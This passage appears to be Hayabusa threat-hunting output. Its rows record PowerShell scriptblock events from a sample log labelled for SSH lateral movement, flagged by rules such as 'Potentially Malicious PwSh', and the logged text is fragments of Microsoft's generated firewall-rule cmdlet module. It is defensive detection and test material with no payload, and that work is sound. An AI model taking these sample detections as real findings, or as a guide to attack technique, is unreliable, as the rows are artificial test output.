[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value,../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,ter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"= $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallRule' -Alias '*' function Remove-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSet",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"= $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallRule' -Alias '*' function Remove-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] 